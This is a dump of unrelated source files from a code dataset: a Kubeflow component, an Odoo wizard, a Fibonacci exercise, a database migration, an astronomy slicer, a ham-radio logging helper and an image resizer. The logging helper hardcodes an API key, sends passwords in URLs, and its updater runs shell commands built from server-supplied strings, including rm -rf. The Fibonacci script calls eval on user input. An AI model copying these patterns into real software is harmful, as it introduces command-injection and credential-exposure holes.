service_account=service_account,\n        network=network)\n\n    trials = [study.Trial.to_json(trial) for trial in hp_job.trials]\n\n    return trials  # pytype: disable=bad-return-type\n\n\ndef serialize_parameters(parameters: dict) -> list:\n    \"\"\"\n    Serializes the hyperparameter tuning parameter spec.\n\n    Args:\n        parameters (Dict[str, hyperparameter_tuning._ParameterSpec]):\n            Dictionary representing parameters to optimize. The dictionary key is the parameter_id,\n            which is passed into your training job as a command line keyword argument, and the\n            dictionary value is the parameter specification of the metric.\n            from google.cloud.aiplatform import hyperparameter_tuning as hpt\n            parameters={\n                'decay': hpt.DoubleParameterSpec(min=1e-7, max=1, scale='linear'),\n                'learning_rate': hpt.DoubleParameterSpec(min=1e-7, max=1, scale='linear'),\n                'batch_size': hpt.DiscreteParameterSpec(values=[4, 8, 16, 32, 64, 128], scale='linear')\n            }\n            Supported parameter specifications can be found in aiplatform.hyperparameter_tuning.\n            These parameter specifications are currently supported:\n            DoubleParameterSpec, IntegerParameterSpec, CategoricalParameterSpec, DiscreteParameterSpec\n\n    Returns:\n        List containing an intermediate JSON representation of the parameter spec\n\n    \"\"\"\n    return [\n        study.StudySpec.ParameterSpec.to_json(\n            parameter._to_parameter_spec(parameter_id=parameter_id))\n        for parameter_id, parameter in parameters.items()\n    ]\n\nif __name__ == '__main__':\n    HyperparameterTuningJobRunOp = components.create_component_from_func(\n        hyperparameter_tuning_job_run_op,\n        base_image='python:3.8',\n        packages_to_install=['google-cloud-aiplatform', 'kfp'],\n        output_component_file='component.yaml',\n    )\n","sub_path":"components/google-cloud/google_cloud_pipeline_components/experimental/hyperparameter_tuning_job/component.py","file_name":"component.py","file_ext":"py","file_size_in_byte":13566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"391679094","text":"# -*- coding: utf-8 -*-\nfrom openerp import models, fields, api\n\nclass wiz_assign_owner(models.TransientModel):\n\n    _name = 'wiz.assign.owner'\n    reviewer_id = fields.Many2one('res.users',string='Reviewer',required=True)\n\n    @api.one\n    def assign_owner(self):\n        context = self._context\n        active_id = context.get('active_id')\n        reviewer_id = self.reviewer_id and self.reviewer_id.id or False\n        cost_sheet = self.env['od.cost.sheet']\n        cost_sheet_obj = cost_sheet.browse(active_id)\n        cost_sheet_obj.write({'reviewed_id':reviewer_id})\n        cost_sheet_obj.od_send_mail('cst_sheet_owner_assigned')\n        return True\n","sub_path":"orchid_cost_sheet/wizard/assign_owner.py","file_name":"assign_owner.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"196991138","text":"# fibonacci.py\n# Fibonacci sequence\n#\n# Michael Kemp\n# 9-09-2013\n \ndef main():\n    \n    # Gotta toot that horn.\n    print(\"My incredible Fibonacci number generator!\")\n    \n    # Get generic integer input\n    n = eval(input(\"Please enter an integer greater than 2: \"))\n    \n    # Set the beginning of the Fibonacci sequence\n    NUM_X = 0\n    NUM_Y = 1\n    \n    # Repeat this sequence an arbitrary user specified number of times, n\n    for i in range(1,n):\n        \n        # Set variable z to be the sum of NUM_X + NUM_Y\n        z = NUM_X + NUM_Y\n        \n        # NUM_X gets NUM_Y and NUM_Y gets z\n        NUM_X,NUM_Y = NUM_Y,z\n        \n    # Print the now changed variable NUM_Y\n    print(\"The \", n, \"th number in the Fibonacci 
sequence is \", NUM_Y, sep='')\n \nmain()","sub_path":"lab02/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"419383805","text":"from Person import *\nfrom House import *\nfrom Driver import *\nfrom Programmer import *\n\nperson1 = Driver('Illya', 19)\nperson2 = Programmer('Dmitri', 20)\nhouse = House('Metalistov')\n\nperson1.setDrivExp(7)\nperson2.setProgExp(20)\n\nhouse.settlePerson(person1)\nhouse.settlePerson(person2)\n\nperson1.descriptionOfPerson()\nperson2.descriptionOfPerson()\n\nhouse.descriptionOfHouse()","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"512445058","text":"# -*- coding: latin-1 -*-\r\nfrom copy import deepcopy\r\nfrom Algorithmus import Nachbar\r\ndef Translate(L):\r\n data = [] #Output\r\n colors = [] #StartPunkte der Farben\r\n for y in range(len(L)):\r\n for x in range(len(L[y])):\r\n N = [] #Nachbarn ohne Zahl\r\n #Füge i ohne Zahl hinzu, i ist nicht = \"none\" und i ist von der Form FARBE1 oder FARBE2\r\n [N.append(i[:-1]) for i in Nachbar(L,x,y) if i != \"none\"]\r\n #Falls Farbe in Nachbarn nur 1mal vorkommt n(Ende einer Leitung) und die Farbe noch nicht schon hinzugefügt wurde\r\n if len([s for s in N if L[y][x][:-1] in s])==1 and L[y][x][:-1] not in [t[0] for t in colors]:\r\n colors.append([L[y][x][:-1],x,y])\r\n for col in colors: #Für jede Farbe\r\n dat = \"(\"+str(col[1])+\",\"+str(col[2])+\")&\"\r\n x, y = col[1],col[2] #Startkoordinaten der Farbe\r\n while True:\r\n N = Nachbar(L,x,y)\r\n L[y][x] = \"none\" #Aktuelles Feld auf None, damit beim Naechsten nicht zurück geht\r\n if col[0] in N[0]:\r\n dat += \"r\" #Nachbar rechts\r\n x += 1\r\n elif col[0] in N[1]:\r\n dat += \"u\" #Nachbar unten\r\n y += 1\r\n elif col[0] in N[2]:\r\n dat += \"l\" #Nachbar links\r\n x -= 1\r\n elif col[0] in N[3]:\r\n dat += \"o\" #Nachbar oben\r\n y -=1\r\n else:\r\n break #Kein Nachbar mehr --> Ende der Farbe, aus while heraus\r\n data.append(dat) #String der Farbe an Output hinzufügen \r\n return data","sub_path":"Translator.py","file_name":"Translator.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"183030772","text":"# -*- coding: utf-8 -*-\n\"\"\"The tgapp-stroller2 package\"\"\"\nimport tg\nimport os\nfrom tg import hooks\n\ndepot_photos_path = os.path.join(\n os.getcwd(),\n 'public', 'depot'\n)\n\nproduct_photos_path = os.path.join(\n depot_photos_path,\n 'product_images'\n)\n\n\ndef plugme(app_config, options):\n try:\n # TG 2.3\n app_config['_pluggable_stroller2_config'] = options\n run_enable_depot = False\n if 'depot_backend_type' not in app_config.keys():\n app_config['depot_backend_type'] = 'depot.io.local.LocalFileStorage'\n if 'depot_storage_path' not in app_config.keys():\n app_config['depot_storage_path'] = depot_photos_path\n if 'depot.product_images.backend' not in app_config.keys():\n app_config['depot.product_images.backend'] = app_config['depot_backend_type']\n run_enable_depot = True\n if 'depot.product_images.backend' not in app_config.keys():\n app_config['depot.product_images.storage_path'] = product_photos_path\n run_enable_depot = True\n if run_enable_depot:\n hooks.register('after_config', enable_depot)\n except TypeError:\n # TG 2.4\n app_config.update_blueprint({\n 
'_pluggable_stroller2_config': options\n })\n run_enable_depot = False\n try:\n app_config.get_blueprint_value('depot_backend_type')\n except KeyError:\n app_config.update_blueprint({\n 'depot_backend_type': 'depot.io.local.LocalFileStorage'\n })\n try:\n app_config.get_blueprint_value('depot_storage_path')\n except KeyError:\n app_config.update_blueprint({\n 'depot_storage_path': depot_photos_path\n })\n try:\n app_config.get_blueprint_value('depot.product_images.backend')\n except KeyError:\n app_config.update_blueprint({\n 'depot.product_images.backend': 'depot.io.local.LocalFileStorage'\n })\n run_enable_depot = True\n try:\n app_config.get_blueprint_value('depot.product_images.storage_path')\n except KeyError:\n app_config.update_blueprint({\n 'depot.product_images.storage_path': product_photos_path\n })\n run_enable_depot = True\n if run_enable_depot:\n hooks.register('after_wsgi_middlewares', enable_depot)\n return dict(appid='commerce', global_helpers=True)\n\n\ndef enable_depot(app):\n import logging\n log = logging.getLogger('stroller2.depot')\n\n # DEPOT setup\n from depot.manager import DepotManager\n\n storages = {\n 'product_images': 'product_image'\n }\n\n for storage in storages:\n prefix = 'depot.%s.' % storage\n log.info('Configuring Storage %s*', prefix)\n DepotManager.configure(storage, tg.config, prefix)\n DepotManager.alias(storages[storage], storage)\n return app\n","sub_path":"stroller2/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"85886149","text":"\"\"\"result\n\nRevision ID: b59fd89c997f\nRevises: c0e99c26baf0\nCreate Date: 2018-05-16 12:11:18.778673\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'b59fd89c997f'\ndown_revision = 'c0e99c26baf0'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.drop_column('tournament_competition', 'scheme_id')\n op.add_column(\n 'tournament_competition',\n sa.Column('scheme', sa.String, nullable=False),\n )\n\n op.add_column('phase_result', sa.Column('result', sa.JSON))\n op.add_column('match_competitor', sa.Column('result', sa.JSON))\n\n op.drop_table('match_competitor_result')\n op.drop_table('phase_result_field')\n op.drop_table('result_scheme_field')\n op.drop_table('result_scheme')\n op.drop_table('result_field')\n\n sa.Enum('match', 'competition', name='context_type').drop(\n bind=op.get_bind(),\n checkfirst=False,\n )\n\n\ndef downgrade():\n op.create_table(\n 'result_field',\n sa.Column('id', sa.Integer(), nullable=False, autoincrement=True, primary_key=True),\n sa.Column('name', sa.String(length=200), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n )\n\n op.create_table(\n 'result_scheme',\n sa.Column('id', sa.Integer(), nullable=False, autoincrement=True, primary_key=True),\n sa.Column('name', sa.String(length=200), nullable=False),\n sa.UniqueConstraint('name')\n )\n\n op.create_table(\n 'result_scheme_field',\n sa.Column('id', sa.Integer(), nullable=False, autoincrement=True, primary_key=True),\n sa.Column('scheme_id', sa.Integer(), nullable=False),\n sa.Column('field_id', sa.Integer(), nullable=False),\n sa.Column('sort', sa.Integer(), nullable=True),\n sa.Column('context', sa.Enum('match', 'competition', name='context_type'), nullable=False),\n sa.ForeignKeyConstraint(['field_id'], ['result_field.id'], ),\n sa.ForeignKeyConstraint(['scheme_id'], ['result_scheme.id'], ),\n )\n\n 
op.create_index(op.f('ix_result_scheme_field_field_id'), 'result_scheme_field', ['field_id'], unique=False)\n op.create_index(op.f('ix_result_scheme_field_scheme_id'), 'result_scheme_field', ['scheme_id'], unique=False)\n op.create_index(op.f('ix_result_scheme_field_sort'), 'result_scheme_field', ['sort'], unique=False)\n op.create_index(\n 'result_scheme_field_idx00',\n 'result_scheme_field',\n ['scheme_id', 'field_id', 'context'],\n unique=True,\n )\n\n op.create_table(\n 'phase_result_field',\n sa.Column('id', sa.Integer(), nullable=False, autoincrement=True, primary_key=True),\n sa.Column('phase_result_id', sa.Integer(), nullable=False),\n sa.Column('field_id', sa.Integer(), nullable=False),\n sa.Column('result', sa.Float(), nullable=False),\n sa.ForeignKeyConstraint(['field_id'], ['result_field.id'], ),\n sa.ForeignKeyConstraint(['phase_result_id'], ['phase_result.id'], ),\n )\n\n op.create_index(\n op.f('ix_phase_result_field_field_id'),\n 'phase_result_field',\n ['field_id'],\n unique=False,\n )\n op.create_index(\n op.f('ix_phase_result_field_phase_result_id'),\n 'phase_result_field',\n ['phase_result_id'],\n unique=False,\n )\n\n op.create_table(\n 'match_competitor_result',\n sa.Column('id', sa.Integer(), nullable=False, autoincrement=True, primary_key=True),\n sa.Column('match_competitor_id', sa.Integer(), nullable=True),\n sa.Column('field_id', sa.Integer(), nullable=False),\n sa.Column('result', sa.Float(), nullable=False),\n sa.ForeignKeyConstraint(['field_id'], ['result_field.id'], ),\n sa.ForeignKeyConstraint(['match_competitor_id'], ['match_competitor.id'], ),\n )\n\n op.create_index(\n op.f('ix_match_competitor_result_field_id'),\n 'match_competitor_result',\n ['field_id'],\n unique=False,\n )\n op.create_index(\n op.f('ix_match_competitor_result_match_competitor_id'),\n 'match_competitor_result',\n ['match_competitor_id'],\n unique=False,\n )\n\n op.add_column(\n 'tournament_competition',\n sa.Column('scheme_id', sa.Integer(), sa.ForeignKey('result_scheme.id'), nullable=False),\n )\n\n op.drop_column('tournament_competition', 'scheme')\n op.drop_column('phase_result', 'result')\n op.drop_column('match_competitor', 'result')\n","sub_path":"tman_sqlalchemy_storage/alembic/versions/b59fd89c997f_result.py","file_name":"b59fd89c997f_result.py","file_ext":"py","file_size_in_byte":4460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"135982838","text":"#!/usr/bin/env python3\n#-*-coding:utf-8-*-\nimport os \nfrom PIL import Image\ndef change_picsize(pic_path):\n\tfor pic_list in os.listdir(pic_path):\n\t\tim=Image.open(os.path.join(pic_path,pic_list))\n\t\tw,h=im.size\n\t\tn=h/1366\n\t\tm=w/644\n\t\tim.thumbnail((w/m,h/n))\n\t\tim.save('worked_'+pic_list.split('.')[0]+'.jpg','jpeg')\n\t\treturn (w/m,h/n)\nif __name__=='__main__':\n\tchange_picsize('/Users/yangming/Desktop/pil_learn/python_practice/fiv')\n","sub_path":"0005/0005.py","file_name":"0005.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"58974515","text":"# Class for computing the f_0 metric. 
Nearly identical\n# to HealpixSlicer, but with an added plotting method\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport healpy as hp\n\nfrom .healpixSlicer import HealpixSlicer\nfrom lsst.sims.maf.metrics.summaryMetrics import fOArea, fONv\n\n__all__ = ['fOSlicer']\n\nclass fOSlicer(HealpixSlicer):\n    \"\"\"fO spatial slicer\"\"\"\n    def __init__(self, nside=128, spatialkey1 ='fieldRA' , spatialkey2='fieldDec', verbose=True, **kwargs):\n        super(fOSlicer, self).__init__(verbose=verbose, spatialkey1=spatialkey1, spatialkey2=spatialkey2,\n                                       nside=nside, **kwargs)\n        # Override base plotFuncs dictionary, because we don't want to create plots from Healpix\n        # slicer (skymap, power spectrum, and histogram) -- only fO plot -- when using 'plotData'.\n        self.plotFuncs = {'plotFO':self.plotFO}\n\n\n    def plotFO(self, metricValue, title=None, xlabel='Number of Visits',\n               ylabel='Area (1000s of square degrees)', fignum=None,\n               scale=None, Asky=18000., Nvisit=825,\n               xMin=None, xMax=None, yMin=None, yMax=None, **kwargs):\n        \"\"\"\n        Note that Asky and Nvisit need to be set for both the slicer and the summary statistic\n        for the plot and returned summary stat values to be consistent!\n        \"\"\"\n        colorlinewidth = 2\n        if scale is None:\n            scale = (hp.nside2pixarea(self.nside, degrees=True)  / 1000.0)\n        if fignum:\n            fig = plt.figure(fignum)\n        else:\n            fig = plt.figure()\n        # Expect metricValue to be something like number of visits\n        cumulativeArea = np.arange(1,metricValue.compressed().size+1)[::-1]*scale\n        plt.plot(np.sort(metricValue.compressed()), cumulativeArea,'k-', linewidth=2, zorder = 0)\n        # This is breaking the rules and calculating the summary stats in two places.\n        # One way to possibly clean this up in the future would be to change the order\n        # things are done in the driver so that summary stats get computed first and passed along to the plotting.\n        rarr = np.array(zip(metricValue.compressed()),\n                        dtype=[('fO', metricValue.dtype)])\n        fOArea_value = fOArea(col='fO', Asky=Asky, norm=False,\n                              nside=self.nside).run(rarr)\n        fONv_value = fONv(col='fO', Nvisit=Nvisit, norm=False,\n                          nside=self.nside).run(rarr)\n        fOArea_value_n = fOArea(col='fO', Asky=Asky, norm=True,\n                                nside=self.nside).run(rarr)\n        fONv_value_n = fONv(col='fO', Nvisit=Nvisit, norm=True,\n                            nside=self.nside).run(rarr)\n\n        plt.axvline(x=Nvisit, linewidth=colorlinewidth, color='b')\n        plt.axhline(y=Asky/1000., linewidth=colorlinewidth,color='r')\n\n        plt.axhline(y=fONv_value/1000., linewidth=colorlinewidth, color='b',\n                    alpha=.5, label=r'f$_0$ Nvisits=%.3g'%fONv_value_n)\n        plt.axvline(x=fOArea_value , linewidth=colorlinewidth,color='r',\n                    alpha=.5, label='f$_0$ Area=%.3g'%fOArea_value_n)\n        plt.legend(loc='lower left', fontsize='small', numpoints=1)\n\n        plt.xlabel(xlabel)\n        plt.ylabel(ylabel)\n\n        if title is not None:\n            plt.title(title)\n\n        if (xMin is not None) & (xMax is not None):\n            plt.xlim([xMin,xMax])\n        if (yMin is not None) & (yMax is not None):\n            plt.ylim([yMin,yMax])\n\n        return fig.number\n","sub_path":"python/lsst/sims/maf/slicers/fOSlicer.py","file_name":"fOSlicer.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"199416108","text":"# -*- coding: utf-8 -*-\n# vim:fileencoding=utf-8\n\nimport urllib\nimport std\nimport requests\nimport shutil\nimport os\nfrom os.path import expanduser\nfrom bs4 import BeautifulSoup\nfrom PyQt5.QtWidgets import QMessageBox\nfrom PyQt5.QtGui import QPixmap\n# import urllib.request\n# import 
urllib.parse\nfrom urllib.request import urlretrieve\nfrom urllib.parse import quote\nfrom PyQt5.QtCore import QThread\nfrom PyQt5 import QtCore\nfrom PyQt5.QtWidgets import QWidget\nimport main\n\n\nclass internetWorker(QThread):\n\n    def __init__(self, window, callsign, settings, parrent=None):\n        super().__init__()\n        self.internet_search_window = window\n        self.callsign = callsign\n        self.settings = settings\n\n    def run(self):\n        # print (self.callsign)\n        info_from_internet_array = internetWorker.get_image_from_server(self)\n        # print (info_from_internet_array)\n        if info_from_internet_array != {}:\n            pixmap = QPixmap(info_from_internet_array.get('img'))\n            #pixmap_resized = pixmap.scaled(int(self.settings['search-internet-width']) - 8,\n            #                               int(self.settings['search-internet-height']) - 8,\n            #                               QtCore.Qt.KeepAspectRatio)\n            pixmap_resized = pixmap.scaledToWidth(int(self.settings['image-width']) - 8)\n\n            pixmap_resized_height = pixmap_resized.scaledToHeight(int(self.settings['image-height']) - 8)\n            self.internet_search_window.labelImage.setPixmap(pixmap_resized_height)\n            # return info_from_internet_array\n\n    def get_image_from_server(self):\n        '''\n        Downloads an image from qrz.com.\n        Takes callsign - the call sign to look up.\n        '''\n        url_found = \"https://www.qrz.com/lookup\"\n        # print(self.callsign)\n        parameter_request = \"tquery=\" + self.callsign + \"&mode: callsign\"\n        parameter_to_byte = bytearray(parameter_request, \"utf-8\")\n        data_dictionary = {}\n        try:\n            response = urllib.request.urlopen(url_found, parameter_to_byte)\n            html = response.read().decode(\"utf-8\")\n            soup = BeautifulSoup(html, 'html.parser')\n        except Exception:\n            print(\"get_image_from_server: no connection\")\n            return data_dictionary\n\n        img = soup.find(id=\"mypic\")\n\n        file_name = self.callsign.replace(\"/\", \"_\")\n        # print(\"file_name, img:_>\", file_name, img)\n\n\n        try:\n            if img != None:\n                urllib.request.urlretrieve(img['src'], \"image/\" + file_name + \".jpg\")\n                data_dictionary.update({'img': \"image/\" + file_name + \".jpg\"})\n                # print(data_dictionary)\n        except Exception as e:\n            print(\"Exception:\", e)\n\n        return data_dictionary\n\n\nclass Eqsl_services (QThread):\n\n    def __init__(self, settingsDict, recordObject, std, parent_window):\n        super().__init__()\n        self.recordObject = recordObject\n        self.settingsDict = settingsDict\n        self.std = std\n        self.parrent_window = parent_window\n\n    def send_qso_to_qrz(self):\n        server_url_post = 'https://logbook.qrz.com/api'\n        key_account = \"KEY=81FE-08CA-D97D-8709&\"\n        action = \"ACTION=INSERT&ADIF=80mSSBRN6XC20140121UR4LGA0346\"\n        # print (\"key+action\", key_account + action)\n        response = requests.post(server_url_post, data=key_account + action)\n\n        # print (\"send_to_qrz\", response.text)\n\n    def run(self):\n\n        api_url_eqsl = 'https://www.eQSL.cc/qslcard/importADIF.cfm?ADIFData=LinLog upload'\n        data_qso_string = ''+str(self.recordObject['BAND'])+' '+str(self.recordObject['CALL'])+' '+str(self.recordObject['MODE'])+' '+str(self.recordObject['QSO_DATE'])+' '+str(self.recordObject['RST_RCVD'])+' '+str(self.recordObject['RST_SENT'])+' '+str(self.recordObject['TIME_ON'])+' '\n        data_string_code_to_url = urllib.parse.quote(data_qso_string)\n        user_pasword_eqsl = '&EQSL_USER='+self.settingsDict['eqsl_user']+'&EQSL_PSWD='+self.settingsDict['eqsl_password']\n        #data_qso_string = 
'ADIFData=LinLog%20upload%20%3CBAND%3A'+str(len(band))+'%3AC%3E'+str(band)+'%20%2D%20%3CCALL%3A'+str(len(call))+'%3AC%3'+str(call)+'%20%3CMODE%3A'+str(len(mode))+'%3AC%3E'+str(mode)+'%20%3CQSO%5FDATE%3A'+str(len(qso_date))+'%3AD%3E'+str(qso_date)+'%20%3CRST%5FRCVD%3A'+str(len(rst_rsvd))+'%3AC%3E'+str(rst_rsvd)+'%20%3CRST%5FSENT%3A'+str(len(rst_send))+'%3AC%3E'+str(rst_send)+'%20%2D%20%3CTIME%5FON%3A'+str(len(time_on))+'%3AC%3E'+str(time_on)+'%20%3CEOR%3E&EQSL_USER='+self.settingsDict['eqsl_user']+'&EQSL_PSWD='+self.settingsDict['eqsl_password']\n # print (\"end_qso_to_eqsl\", api_url_eqsl+data_string_code_to_url)\n\n request_eqsl = requests.get(api_url_eqsl+data_string_code_to_url+user_pasword_eqsl)\n\n if request_eqsl.status_code != 200:\n\n std.std().message(\"Can't send to eQSL\", \"\")\n # print(\"request_eqsl.status_code\", request_eqsl.status_code)\n else:\n soup = BeautifulSoup(request_eqsl.text, 'html.parser')\n response = soup.body.contents[0]\n # print (\"SOUP\", soup.body.contents[0].strip())\n if (response.find('Warning')!= -1) or (response.find('Error')!= -1):\n message = QMessageBox(self.parrent_window)\n #message.setFixedHeight(200)\n #message.setGeometry(500, 300, 1000, 500)\n message.setStyleSheet(\"font: 12px;\")\n message.setWindowTitle(\"Warning!\")\n message.setText(\"Can't send to eQSL.cc\")\n #message.setText(soup.body.contents[0].strip())\n message.setInformativeText(soup.body.contents[0].strip())\n message.setStandardButtons(QMessageBox.Ok)\n message.exec_()\n #print(request_eqsl.text)\n \n\n\n #request_eqsl = requests.get(\n # 'https://www.eQSL.cc/qslcard/importADIF.cfm?ADIFData=LinLog%20upload%20%3CADIF%5FVER%3A4%3E1%2E00%20%3CEOH%3E%20%3CBAND%3A3%3AC%3E30M%20%2D%20%3CCALL%3A6%3AC%3EWB4WXX%20%3CMODE%3A3%3AC%3ESSB%20%3CQSO%5FDATE%3A8%3AD%3E20010503%20%3CRST%5FRCVD%3A2%3AC%3E52%20%3CRST%5FSENT%3A2%3AC%3E59%20%2D%20%3CTIME%5FON%3A6%3AC%3E122500%20%3CEOR%3E&EQSL_USER=ur4lga&EQSL_PSWD=a9minx3m')\n\nclass check_update (QThread):\n\n def __init__(self, APP_VERSION, settingsDict, parrentWindow):\n super().__init__()\n self.version = APP_VERSION\n self.settingsDict = settingsDict\n self.parrent = parrentWindow\n\n\n def run(self):\n\n server_url_get = 'http://357139-vds-bastonsv.gmhost.pp.ua'\n path_directory_updater_app = \"/upd/\"\n\n action = server_url_get+path_directory_updater_app+self.version+\"/\"+self.settingsDict['my-call']\n flag = 0\n data_flag = 0\n try:\n response = requests.get(action)\n flag = 1\n except Exception:\n flag = 0\n\n if flag == 1:\n soup = BeautifulSoup(response.text, 'html.parser')\n try:\n version = soup.find(id=\"version\").get_text()\n git_path = soup.find(id=\"git_path\").get_text()\n date = soup.find(id=\"date\").get_text()\n data_flag = 1\n except Exception:\n std.std.message(self.parrent, \"You have latest version\", \"UPDATER\")\n self.parrent.check_update.setText(\"> Check update <\")\n self.parrent.check_update.setEnabled(True)\n if data_flag == 1:\n update_result = QMessageBox.question(self.parrent, \"LinuxLog | Updater\",\n \"Found new version \"+version+\" install it?\",\n buttons=QMessageBox.Yes | QMessageBox.No,\n defaultButton=QMessageBox.Yes)\n if update_result == QMessageBox.Yes:\n # print(\"Yes\")\n #try:\n self.parrent.check_update.setText(\"Updating\")\n adi_name_list = []\n for file in os.listdir():\n if file.endswith(\".adi\"):\n adi_name_list.append(file)\n rules_name_list = []\n for file in os.listdir():\n if file.endswith(\".rules\"):\n rules_name_list.append(file)\n # print(\"Rules name List:_>\", rules_name_list)\n 
# print(\"Adi name List:_>\", adi_name_list)\n home = expanduser(\"~\")\n # print(\"Home path:_>\", home)\n os.mkdir(home+\"/linuxlog-backup\")\n for i in range(len(adi_name_list)):\n os.system(\"cp '\"+adi_name_list[i]+\"' \"+home+\"/linuxlog-backup\")\n for i in range(len(rules_name_list)):\n os.system(\"cp '\" + rules_name_list[i] + \"' \" + home + \"/linuxlog-backup\")\n os.system(\"cp settings.cfg \" + home+\"/linuxlog-backup\")\n # archive dir\n if os.path.isdir(home+'/linlog-old'):\n pass\n else:\n os.system(\"mkdir \"+home+\"/linlog-old\")\n os.system(\"tar -cf \"+home+\"/linlog-old/linlog\"+version+\".tar.gz \" + home + \"/linlog/\")\n\n # delete dir linlog\n os.system(\"rm -rf \" + home + \"/linlog/\")\n # clone from git repository to ~/linlog\n os.system(\"git clone \" + git_path + \" \" + home + \"/linlog\")\n\n # copy adi and rules file from linuxlog-backup to ~/linlog\n for i in range(len(adi_name_list)):\n os.system(\"cp '\"+home+\"/linuxlog-backup/\" + adi_name_list[i] + \"' '\" + home + \"/linlog'\")\n for i in range(len(rules_name_list)):\n os.system(\"cp '\" + home + \"/linuxlog-backup/\" + rules_name_list[i] + \"' '\" + home + \"/linlog'\")\n\n # read and replace string in new settings.cfg\n\n file = open(home+\"/linlog/settings.cfg\", \"r\")\n settings_list = {}\n for configstring in file:\n if configstring != '' and configstring != ' ' and configstring[0] != '#':\n configstring = configstring.strip()\n configstring = configstring.replace(\"\\r\", \"\")\n configstring = configstring.replace(\"\\n\", \"\")\n splitString = configstring.split('=')\n settings_list.update({splitString[0]: splitString[1]})\n file.close()\n for key_new in settings_list:\n for key_old in self.settingsDict:\n if key_new == key_old:\n settings_list[key_new] = self.settingsDict[key_old]\n\n\n\n # print(\"settings list^_>\", settings_list)\n\n filename = home+\"/linlog/settings.cfg\"\n with open(filename, 'r') as f:\n old_data = f.readlines()\n for index, line in enumerate(old_data):\n key_from_line = line.split('=')[0]\n # print (\"key_from_line:\",key_from_line)\n for key in settings_list:\n\n if key_from_line == key:\n # print(\"key\",key , \"line\", line)\n old_data[index] = key + \"=\" + settings_list[key] + \"\\n\"\n with open(filename, 'w') as f:\n f.writelines(old_data)\n # done!\n\n #delete backup dir\n os.system(\"rm -rf \" + home + \"/linuxlog-backup\")\n\n std.std.message(self.parrent, \"Update to v.\"+version+\" \\nCOMPLITED \\n \"\n \"Please restart LinuxLog\", \"UPDATER\")\n self.version = version\n self.parrent.check_update.setText(\"> Check update <\")\n self.parrent.check_update.setEnabled(True)\n self.parrent.text.setText(\"Version:\"+version+\"\\n\\nBaston Sergey\\nbastonsv@gmail.com\")\n\n\n else:\n # print(\"No\")\n self.parrent.check_update.setText(\"> Check update <\")\n self.parrent.check_update.setEnabled(True)\n\n else:\n std.std.message(self.parrent, \"Sorry\\ntimeout server.\", \"UPDATER\")\n\n","sub_path":"internetworker.py","file_name":"internetworker.py","file_ext":"py","file_size_in_byte":13053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"394654429","text":"# Copyright 2022 Sipeed Technology Co., Ltd. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\nfrom PIL import Image\nimport os,sys\nimport numpy as np\n\ndef mkdir(path):\n path = path.strip()\n path = path.rstrip(\"\\\\\")\n isExists = os.path.exists(path)\n if not isExists:\n os.makedirs(path)\n return True\n else:\n return False\n\ndef print_usage():\n print(\"Usage: python3 resize_img.py in_dir out_dir size\")\n print(\" size: 224,224,3\")\n\n# python3 resize_img.py imagenet quant_imagenet 224,224,3\nif __name__ == '__main__':\n if len(sys.argv) != 4:\n print_usage()\n exit()\n\n in_dir = sys.argv[1]\n out_dir = sys.argv[2]\n size = sys.argv[3]\n size = size.split(\",\")\n size = [int(i) for i in size]\n dst_h = size[0]\n dst_w = size[1]\n dst_ch = size[2]\n \n files = os.listdir(in_dir)\n mkdir(out_dir)\n\n for f in files:\n if f[-4:] != \".jpg\" and f[-4:] != \".png\" and f[-4:] != \".bmp\" and f[-4:] != \".ppm\" and f[-4:] != \".pgm\" and f[-5:] != \".JPEG\":\n continue \n f1 = in_dir+\"/\"+f \n img = Image.open(f1)\n src_w = img.size[0]\n src_h = img.size[1]\n src_ch= img.layers\n #if dst_w/dst_h > src_w/src_h:\n img = img.resize((dst_w, dst_h), Image.ANTIALIAS)\n if dst_ch != src_ch:\n if dst_ch==3 and src_ch==1:\n img0 = np.array(img)\n img1 = np.zeros((dst_h,dst_w,dst_ch))\n img1[:,:,0]=img0;img1[:,:,1]=img0;img1[:,:,2]=img0\n img = Image.fromarray(img1.astype(np.uint8))\n elif dst_ch==1 and src_ch==3:\n img = np.array(img)\n img = img.mean(axis=2)\n img = Image.fromarray(img.astype(np.uint8))\n else:\n print(\"can't support ch %d -> %d\"%(src_ch, dst_ch))\n exit()\n img.save(out_dir+\"/\"+f.split(\".\")[-2]+\".jpg\")\n print(out_dir+\"/\"+f.split(\".\")[-2]+\".jpg\")\n 